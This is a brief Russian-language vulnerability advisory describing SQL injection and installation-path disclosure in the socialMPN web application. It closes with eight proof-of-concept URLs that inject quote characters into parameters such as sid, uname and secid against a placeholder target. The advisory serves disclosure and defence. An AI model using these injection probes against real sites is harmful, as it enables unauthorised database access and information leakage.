Программа: socialMPN
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и определить установочную директорию приложения на сервере.
Уязвимость существует из-за недостаточной проверки входных данных в нескольких переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения и получить данные об установочной директории приложения на сервере.
Пример:
http://[target]/article.php?sid=%27
http://[target]/use r.php?uname=' &pass=1&op=login
http://[target]/viewforum.php? forum=43&siteid=%2527
http://[target]/newtopic.php? username='&password=
http://[target]/sections.php? op=listarticles&secid=%27
http://[target]/sections.php? op=listarticles&artid=%2527
http://[target]/index.php?siteid=' &op=show&aftersid=380
http://[target]/friend .php?sid= %2527&yname=1&ymail=1 & fname=1&fmail=1&op=SendStory
